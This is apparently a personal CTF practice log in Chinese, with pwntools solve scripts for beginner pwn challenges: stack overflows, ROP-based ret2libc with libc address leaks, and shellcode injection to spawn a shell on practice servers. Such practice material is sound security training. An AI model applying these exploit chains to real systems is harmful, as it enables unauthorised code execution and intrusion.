20250728-20250803
20250729-20250803
题目复现
本周回家适应阶段,无难题,题目均为平时简单刷题练手,没有稳定的时间去研究好题
ciscn_2019_n_8
32位,保护:Canary、PIE、NX 均开启
数组覆盖,入门题
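#encoding=utf-8
# Reproducible locally.
#
# ciscn_2019_n_8: the input is copied into an array and a later element is
# compared against 0x11 (the "array overwrite" intro challenge); element 13
# is overwritten with the expected value.  -- presumed from the payload,
# confirm against the binary.
#
# NOTE(review): the original first line read `#encoding=uft-8`.  As the first
# line of a script it is parsed as a PEP 263 coding declaration, and CPython
# aborts with "SyntaxError: unknown encoding: uft-8" before running anything.
from pwn import *

io = process('./ciscn_2019_n_8')
# 13 dwords of filler, then the 4-byte value the check expects.
io.sendline(b"aaaa" * 13 + p32(0x11))
io.interactive()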
bjdctf_2020_babystack
64位,NX
read溢出
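#encoding=utf-8
# Original note: "cannot be reproduced locally; the remote target has no stack
# migration".  NOTE(review): that note contradicts the live lines below, which
# run process('./pwn') with remote() commented out -- swap the two to hit the
# remote box.
#
# bjdctf_2020_babystack: read() overflow, ret2text.
from pwn import *

io = process('./pwn')
# io = remote('node5.buuoj.cn',25982)

# First prompt is presumably the read length; 100 exceeds the 0x18-byte
# buffer so the following read() overflows.  Bytes rather than str: on
# Python 3 pwntools only converts str implicitly (and raises a BytesWarning).
io.sendline(b'100')
# 0x18 bytes of filler up to the saved return address, then the target
# (presumably the backdoor function -- confirm in the binary).
payload = b'a' * 0x18 + p64(0x04006E6)
io.sendline(payload)
io.interactive()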
ciscn_2019_c_1
64位,NX
gets,简单libc
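#encoding=utf-8
# Not reproducible locally (the chain depends on the remote target's libc).
#
# ciscn_2019_c_1: gets() overflow, ret2libc in two rounds.  Round one leaks
# puts@GOT through puts@PLT and returns to main; round two calls
# system("/bin/sh") with addresses resolved via LibcSearcher.
from pwn import*
from LibcSearcher import*

io=remote('node5.buuoj.cn',27290)
# io=process('./pwn')
elf=ELF('./pwn')

main=0x400b28
pop_rdi=0x400c83
ret=0x4006b9   # lone `ret`; presumably there to keep rsp 16-byte aligned before system()
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']

# Leading NUL byte: the program "encrypts" the input (see the `encrypted`
# prompt), presumably with a strlen-bounded loop, so a zero first byte keeps
# the rest of the chain untouched while gets() still copies all of it.
# Confirm the loop bound against the binary.
overflow = b'\0' + b'a' * (0x50 - 1 + 8)

# ---- round 1: leak the libc address of puts ----
io.sendlineafter(b'choice!\n', b'1')
payload = overflow
payload += p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
# attach(io)
io.sendlineafter(b'encrypted\n', payload)
io.recvline()
io.recvline()
leak = io.recvuntil(b'\n')[:-1]
puts_addr = u64(leak.ljust(8, b'\0'))
print(hex(puts_addr))
# A userland libc address on x86-64 fits in 6 bytes and is never 0; anything
# else means the recvline() offsets above are wrong and round two would be
# built on garbage.
if puts_addr == 0 or puts_addr >> 48:
    log.error('unexpected puts leak %r (check the recvline() offsets)' % (leak,))

libc = LibcSearcher('puts', puts_addr)
libcbase = puts_addr - libc.dump('puts')
binsh = libcbase + libc.dump('str_bin_sh')
system = libcbase + libc.dump('system')

# ---- round 2: system("/bin/sh") ----
io.sendlineafter(b'choice!\n', b'1')
payload = overflow
payload += p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
io.sendlineafter(b'encrypted\n', payload)
io.interactive()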
jarvisoj_level2_x64
64位,NX
read溢出,system传参
#encoding=utf-8
# Not reproducible locally.
#
# jarvisoj_level2_x64: read() overflows the stack buffer; ret2text with a
# `pop rdi; ret` gadget to pass the "/bin/sh" string present in the binary
# to system.
from pwn import *

r = remote("node5.buuoj.cn", 29271)

system = 0x40063e   # presumably system@plt
binsh = 0x400a90    # presumably the "/bin/sh" string in the binary
poprdi = 0x4006b3   # pop rdi; ret

# 0x80-byte buffer plus 8 bytes of saved rbp, then the rop chain.
padding = b'a' * 0x80 + b'b' * 8
chain = [p64(poprdi), p64(binsh), p64(system)]
payload = padding + b''.join(chain)

r.sendlineafter(b'Input:\n', payload)
r.interactive()
get_started_3dsctf_2016
32位,静态编译,函数调用 or mprotect函数利用
#encoding=utf-8
# Reproducible locally.
#
# get_started_3dsctf_2016: 32-bit, statically linked.  Overflow the 56-byte
# buffer and call the flag routine with its two magic arguments (the other
# route, mprotect + shellcode, is not used here).
from pwn import*
from LibcSearcher import*   # not used by this script; kept as in the original

# io=remote('node5.buuoj.cn',29354)
io=process('./pwn')
elf=ELF('./pwn')

target = 0x080489A0   # function to call (presumably get_flag)
ret_to = 0x0804E6A0   # its return address (presumably exit, so buffered stdout is flushed)
arg1, arg2 = 0x308CD64F, 0x195719D1   # the two values the function checks

# 32-bit cdecl fake frame: [return into target][target's return addr][arg1][arg2]
frame = [p32(target), p32(ret_to), p32(arg1), p32(arg2)]
payload = b'a' * 56 + b''.join(frame)
io.sendline(payload)
io.interactive()
(2024CTF+)简单的签到
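#!/usr/bin/env python
# (2024CTF+) 简单的签到 -- answer one arithmetic question from the server.
from pwn import *

context.arch = "amd64"
s = remote('nc1.ctfplus.cn', 45004)
#s = process('./main')
#shellcode = asm(shellcraft.sh())

# Wait for the banner, then press enter to start.  Bytes rather than str:
# on Python 3 pwntools only converts str implicitly (with a BytesWarning).
s.recvuntil(b"to start our challenge.")
s.sendline(b'')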
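def formula_compute(formula: bytes, precise: bool = False) -> bytes:
    """Evaluate the arithmetic question sent by the server; return the answer as bytes.

    ``formula`` is the raw text received up to (and including) the ``=``
    sign, e.g. ``b"3 x 4 ^ 2 ="``.  The server's operator spelling is
    normalised to Python syntax: ``x`` -> ``*``, ``^`` -> ``**``,
    ``÷`` -> ``/``.

    With ``precise=False`` (the default) every division becomes integer
    division (``//``); with ``precise=True`` ``/`` stays float division.

    Security: the text comes from a remote socket and is untrusted, so it is
    NOT handed to ``eval``.  It is parsed with ``ast`` and only numeric
    literals, unary ``+``/``-`` and the binary operators ``+ - * / // % **``
    are evaluated; anything else (names, calls, attributes, ...) raises
    ``ValueError``.  Exponent size is not bounded, so a hostile server could
    still make ``**`` slow.

    Returns ``str(result)`` encoded as UTF-8.
    Raises ``ValueError`` for malformed or non-arithmetic input.
    """
    import ast
    import operator

    if isinstance(formula, bytes):
        formula = formula.decode("UTF-8")
    # Keep the expression before '=' and normalise the operator spelling.
    formula = formula.strip().split('=')[0].strip()
    formula = formula.replace("x", "*").replace("^", "**").replace("÷", "/")
    if not precise:
        # Collapse an existing '//' first so the second replace cannot turn
        # it into '////'.
        formula = formula.replace("//", "/").replace("/", "//")

    binary_ops = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.FloorDiv: operator.floordiv,
        ast.Mod: operator.mod,
        ast.Pow: operator.pow,
    }
    unary_ops = {ast.UAdd: operator.pos, ast.USub: operator.neg}

    def _ev(node):
        # Whitelist walk: numbers, unary sign, and the arithmetic operators above.
        if isinstance(node, ast.Constant):
            value = node.value
            if isinstance(value, (int, float)) and not isinstance(value, bool):
                return value
        elif isinstance(node, ast.BinOp) and type(node.op) in binary_ops:
            return binary_ops[type(node.op)](_ev(node.left), _ev(node.right))
        elif isinstance(node, ast.UnaryOp) and type(node.op) in unary_ops:
            return unary_ops[type(node.op)](_ev(node.operand))
        raise ValueError("unsupported token in formula: %r" % (formula,))

    try:
        tree = ast.parse(formula, mode="eval")
    except SyntaxError as exc:
        raise ValueError("malformed formula: %r" % (formula,)) from exc
    return bytes(str(_ev(tree.body)), encoding="UTF-8")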
# The server prints one formula ending in '='; answer it and hand over the shell.
question = s.recvuntil(b"=")
s.sendline(formula_compute(question))
s.interactive()
(2024CTF+)你会栈溢出吗
#!/usr/bin/env python
# (2024CTF+) 你会栈溢出吗 -- plain stack overflow, ret2text.
from pwn import *

context.arch = "amd64"
#elf = ELF('./pwn')
#s = process('./pwn')
s = remote('nc1.ctfplus.cn', 11259)

addr_ret = 0x40057e   # presumably a lone `ret`, inserted for 16-byte stack alignment
target = 0x400728     # presumably the backdoor / flag function -- confirm in the binary

# 20 bytes of filler up to the saved return address, then the ret gadget, then the target.
payload = b''.join([b'A' * 20, p64(addr_ret), p64(target)])
s.sendline(payload)
s.interactive()
(2024CTF+)ez_shellcode
#!/usr/bin/env python
# (2024CTF+) ez_shellcode -- first input stores shellcode, second input
# overflows the name field to redirect execution to it.
from pwn import *

context.os = 'Linux'
context.arch = 'amd64'

sh = remote("nc1.ctfplus.cn", 35838)
#sh = process('./pwn')

shellcode = asm(shellcraft.amd64.sh())
buf2_addr = 0x0000401256   # return target; lies in .text, so presumably a stub that jumps into the shellcode buffer -- confirm in the binary
addr_ret = 0x040101a       # presumably a lone `ret` for stack alignment

# Stage 1: deliver the shellcode.  NOTE(review): sendline appends a '\n'
# after the shellcode; that is only harmless if the read size leaves room.
sh.recvuntil(b"shellcode?")
sh.sendline(shellcode)

# Stage 2: 32 bytes of filler up to the saved return address, then the chain.
sh.recvuntil(b"name:")
sh.sendline(b''.join([b'A' * 32, p64(addr_ret), p64(buf2_addr)]))
sh.interactive()